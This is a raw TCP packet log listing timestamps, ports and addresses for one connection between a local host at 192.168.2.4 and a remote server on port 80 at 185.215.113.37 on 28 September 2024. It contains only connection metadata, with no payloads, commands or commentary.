Sep 28, 2024 21:26:16.904414892 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904436111 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904776096 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904825926 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904838085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904848099 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904890060 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904985905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904997110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905005932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905014992 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905024052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905034065 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905066013 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905066013 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905298948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905309916 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905318022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905328989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905338049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905347109 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905355930 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905356884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905365944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905375004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905375957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905386925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905394077 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905400038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905412912 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905431986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905461073 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905621052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905637980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905647993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.905673027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905673027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.905705929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.998588085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998599052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998608112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998611927 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998620987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998626947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998635054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998666048 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.998704910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.998728037 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998739004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998744011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998750925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998785019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998784065 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.998797894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998806000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.998807907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998817921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998823881 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.998828888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998840094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.998853922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.998876095 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.999095917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.999140024 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.999162912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.999174118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.999236107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.999236107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.999286890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.999295950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.999305010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.999314070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.999327898 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.999362946 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.999362946 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.001235962 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.001290083 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.001327991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.001338005 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.001348019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.001357079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.001367092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.001382113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.001382113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.001399994 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.001439095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.001442909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.001506090 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.002475977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.002540112 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.002552986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.002563953 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.002602100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.002615929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.002625942 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.002659082 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.002690077 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.002707005 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.002720118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.002728939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.002753973 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.002801895 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003407955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003456116 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003460884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003469944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003493071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003524065 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003586054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003597021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003604889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003613949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003657103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003657103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003700972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003712893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003745079 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003777027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003789902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003798962 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003806114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003832102 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003863096 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003875971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003885984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003916025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003936052 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003947973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003957987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.003998995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.003998995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004040003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004050016 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004057884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004066944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004076958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004091978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004091978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004123926 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004125118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004151106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004168034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004193068 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004199982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004240990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004283905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004293919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004302979 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004312992 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004322052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004323959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004333019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004348993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004348993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004379988 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004414082 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004456043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004547119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004558086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004568100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004576921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004585981 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004595995 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004606009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004612923 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004612923 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004616022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004642963 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004643917 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004678965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004867077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004877090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004884958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004894018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004904985 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.004920959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004920959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.004955053 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005029917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005039930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005048990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005058050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005067110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005074978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005111933 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005111933 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005179882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005189896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005198956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005208015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005224943 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005254984 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005302906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005343914 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005381107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005393028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005403042 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005414009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005424023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005431890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005431890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005434036 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005449057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005458117 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005472898 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005496025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005688906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005698919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005707979 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005717039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005727053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005743027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005743027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005763054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005774975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005778074 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005784035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005795002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005803108 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005805016 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005815983 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005824089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005826950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.005863905 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005863905 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.005891085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.006069899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.006079912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.006119013 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.006119013 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.006160021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.006170034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.006179094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.006189108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.006200075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.006210089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.006210089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.006241083 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.006308079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.006328106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.006354094 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.006380081 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.090790987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.090817928 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.090826988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.090864897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.090867043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.090867043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.090915918 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.090953112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.090961933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.090989113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.090998888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091002941 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091003895 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091010094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091028929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091058016 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091296911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091305017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091312885 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091324091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091334105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091341019 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091342926 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091378927 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091378927 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091379881 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091681004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091690063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091700077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091722012 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091753006 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091768980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091778994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091788054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091798067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.091815948 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.091846943 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.093700886 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.093753099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.093907118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.093916893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.093925953 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.093935013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.093943119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.093954086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.093964100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.093964100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.093964100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.094006062 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.094037056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.094082117 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.095247984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095257044 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095267057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095299006 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.095299006 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.095386982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095398903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095407963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095417023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095431089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.095467091 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.095467091 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.095469952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095514059 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.095926046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095973969 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.095978975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.095990896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096029043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096029043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096076012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096086025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096095085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096103907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096113920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096131086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096131086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096163034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096240044 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096255064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096287966 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096287966 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096311092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096313000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096322060 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096332073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096358061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096389055 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096404076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096415043 CEST	80	49732	185.215.113.37	192.168.2.4
